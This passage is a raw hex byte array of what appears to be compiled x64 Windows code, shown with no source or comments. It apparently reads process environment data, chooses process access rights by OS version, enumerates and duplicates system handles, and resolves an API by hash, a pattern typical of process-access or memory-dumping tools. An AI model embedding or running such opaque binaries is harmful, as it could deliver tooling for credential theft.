x74,0x29,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x50,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5D,0x1C,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x36,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xE9,0x03,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x50,0x60,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0x48,0x8B,0x05,0x34,0x1C,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0D,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xE9,0xDA,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0x93,0x83,0x7D,0x18,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xB5,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x78,0xAC,0x00,0x00,0x48,0x89,0xC1,0xE8,0x05,0xFF,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDA,0xEC,0x01,0xA3,0x48,0x89,0xC1,0xE8,0x13,0xFD,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x83,0x7D,0xD0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7C,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x52,0x87,0x00,0x00,0x66,0x89,0x45,0xB0,0x0F,0xB7,0x45,0xB0,0x01,0xC0,0x66,0x89,0x45,0xB0,0x0F,0xB7,0x45,0xB0,0x83,0xC0,0x02,0x66,0x89,0x45,0xB2,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xA8,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x45,0xD0,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xFF,0xD0,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xA8,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x6F,0x1A,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x60,0x1A,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x0B,0x01,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x6A,0xAB,0x00,0x00,0x48,0x89,0xC1,0xE8,0x54,0x11,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xE4,0x00,0x00,0x00,0x48,0x8D,0x55,0xD4,0x48,0x8D,0x45,0xD8,0x48,0x89,0xC1,0xE8,0xF6,0x0C,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xCA,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0x95,0x00,0x00,0x00,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x20,0x75,0x5C,0x48,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x75,0x50,0x48,0x8B,0x45,0xE0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD0,0x39,0xC2,0x75,0x41,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x77,0x62,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x40,0x06,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xE8,0x89,0x0A,0x4C,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x89,0xC0,0x48,0x89,0x4C,0xC2,0x08,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x5C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xE8,0x00,0x74,0x47,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8F,0x87,0x00,0x00,0x48,0x8B,0x05,0x00,0x19,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF8,0x18,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xD4,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3B,0x87,0x00,0x00,0x48,0x8B,0x5D,0xD8,0x48,0x8B,0x05,0xA8,0x18,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA4,0x18,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x47,0x18,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x38,0x18,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x0B,0x01,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x4E,0xA9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2C,0x0F,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xE4,0x00,0x00,0x00,0x48,0x8D,0x55,0xD4,0x48,0x8D,0x45,0xD8,0x48,0x89,0xC1,0xE8,0xCE,0x0A,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xCA,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0x95,0x00,0x00,0x00,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x20,0x75,0x5C,0x48,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x75,0x50,0x48,0x8B,0x45,0xE0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD0,0x39,0xC2,0x75,0x41,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x77,0x62,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x40,0x06,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xE8,0x89,0x0A,0x4C,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x89,0xC0,0x48,0x89,0x4C,0xC2,0x08,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x5C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xD4,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x67,0x85,0x00,0x00,0x48,0x8B,0x5D,0xD8,0x48,0x8B,0x05,0xD4,0x16,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD0,0x16,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xE8,0x00,0x74,0x47,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x13,0x85,0x00,0x00,0x48,0x8B,0x05,0x84,0x16,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x7C,0x16,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x89,0x4D,0x20,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x18,0x16,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x09,0x16,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x04,0x01,0x00,0x00,0x48,0x8D,0x45,0xD0,0x48,0x89,0xC2,0x48,0x8D,0x05,0x36,0xA7,0x00,0x00,0x48,0x89,0xC1,0xE8,0x04,0x0D,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xE4,0x00,0x00,0x00,0x48,0x8D,0x55,0xD4,0x48,0x8D,0x45,0xD8,0x48,0x89,0xC1,0xE8,0xA6,0x08,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xCA,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0x95,0x00,0x00,0x00,0x48,0x8B,0x4D,0xD8,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x20,0x75,0x5C,0x48,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x75,0x50,0x48,0x8B,0x45,0xE0,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD0,0x39,0xC2,0x75,0x41,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x77,0x62,0x48,0x8B,0x45,0xE0,0x0F,0xB7,0x40,0x06,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xE8,0x89,0x0A,0x4C,0x89,0xC1,0x48,0x8B,0x55,0xE8,0x89,0xC0,0x48,0x89,0x4C,0xC2,0x08,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x5C,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x30,0x48,0x8B,0x55,0xE8,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xD8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xD4,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3F,0x83,0x00,0x00,0x48,0x8B,0x5D,0xD8,0x48,0x8B,0x05,0xAC,0x14,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA8,0x14,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xE8,0x00,0x74,0x47,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x88,0x38,0x01,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xEB,0x82,0x00,0x00,0x48,0x8B,0x05,0x5C,0x14,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x54,0x14,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x66,0x0F,0xD6,0x45,0xF0,0x48,0x8D,0x55,0xC0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x38,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD5,0x36,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x1D,0x8B,0x45,0xC4,0x23,0x45,0x18,0x39,0x45,0x18,0x75,0x09,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x68,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xF0,0x48,0x8B,0x45,0x10,0xC7,0x44,0x24,0x30,0x02,0x00,0x00,0x00,0x8B,0x55,0x18,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0xC7,0xC2,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xEE,0x35,0x00,0x00,0x89,0x45,0xFC,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x19,0x32,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0x8E,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x75,0x07,0xC7,0x45,0xFC,0x02,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x10,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x40,0x00,0x00,0x00,0x49,0x89,0xD1,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x3E,0x35,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x42,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x4D,0xE8,0x8B,0x55,0xFC,0x89,0x54,0x24,0x30,0x8B,0x55,0x20,0x89,0x54,0x24,0x28,0x8B,0x55,0x18,0x89,0x54,0x24,0x20,0x49,0x89,0xC9,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x48,0xC7,0xC2,0xFF,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xFF,0x34,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0x10,0x00,0x74,0x0C,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x19,0x31,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x04,0x31,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x10,0x04,0x00,0x00,0xEB,0x05,0xB8,0x10,0x10,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x80,0x04,0x00,0x00,0xEB,0x05,0xB8,0x80,0x10,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x05,0x18,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x06,0x77,0x07,0xB8,0x10,0x04,0x00,0x00,0xEB,0x05,0xB8,0x10,0x10,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE8,0xE7,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0xBD,0x88,0x00,0x00,0x00,0x00,0x75,0x09,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x89,0x45,0xDC,0x48,0x83,0x7D,0x10,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE1,0x01,0x00,0x00,0x83,0x7D,0x30,0x00,0x74,0x0E,0xC7,0x45,0x28,0x01,0x00,0x00,0x00,0xC7,0x45,0x20,0x01,0x00,0x00,0x00,0x83,0xBD,0x90,0x00,0x00,0x00,0x00,0x74,0x07,0xC7,0x45,0x20,0x01,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x74,0x04,0x83,0x4D,0xE8,0x02,0x83,0x7D,0x70,0x00,0x75,0x06,0x83,0x7D,0x78,0x00,0x74,0x10,0x83,0x7D,0xDC,0x00,0x75,0x0A,0xE8,0xA9,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0xEB,0x11,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x74,0x08,0xE8,0xE3,0xFE,0xFF,0xFF,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x89,0x45,0xE0,0x83,0x7D,0x28,0x00,0x74,0x07,0xC7,0x45,0xEC,0x00,0x10,0x00,0x00,0x44,0x8B,0x4D,0x38,0x44,0x8B,0x45,0x20,0x8B,0x55,0xEC,0x8B,0x45,0x18,0x8B,0x4D,0xE8,0x89,0x4C,0x24,0x30,0x8B,0x4D,0x48,0x89,0x4C,0x24,0x28,0x8B,0x4D,0x40,0x89,0x4C,0x24,0x20,0x89,0xC1,0xE8,0x4C,0x01,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x08,0x01,0x00,0x00,0x8B,0x55,0xEC,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xD7,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0xEF,0x00,0x00,0x00,0x83,0x7D,0x28,0x00,0x74,0x41,0x8B,0x4D,0xE8,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xC3,0xFC,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xC8,0x00,0x00,0x00,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x91,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x75,0x52,0xE9,0xB8,0x00,0x00,0x00,0x83,0x7D,0x70,0x00,0x75,0x0F,0x83,0x7D,0x78,0x00,0x75,0x09,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x74,0x38,0x83,0x7D,0xDC,0x00,0x74,0x32,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xE2,0xFB,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x79,0x8B,0x55,0xE0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x3F,0xFB,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x64,0x83,0x7D,0x70,0x00,0x74,0x1A,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x37,0x0B,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x47,0x83,0x7D,0x78,0x00,0x74,0x1E,0x48,0x8B,0x95,0x80,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xFE,0x0B,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x26,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x13,0x48,0x83,0x7D,0xF0,0x00,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xC0,0x2D,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x7D,0x38,0x00,0x75,0x61,0x83,0x7D,0x20,0x00,0x74,0x19,0x8B,0x4D,0x40,0x8B,0x55,0x18,0x8B,0x45,0x10,0x41,0x89,0xC8,0x89,0xC1,0xE8,0xE8,0x06,0x00,0x00,0x48,0x89,0x45,0xF8,0xEB,0x42,0x83,0x7D,0x28,0x00,0x75,0x3C,0x83,0x7D,0x30,0x00,0x75,0x36,0x83,0x7D,0x10,0x00,0x74,0x1F,0x8B,0x4D,0x40,0x8B,0x55,0x18,0x8B,0x45,0x10,0x41,0x89,0xC9,0x41,0x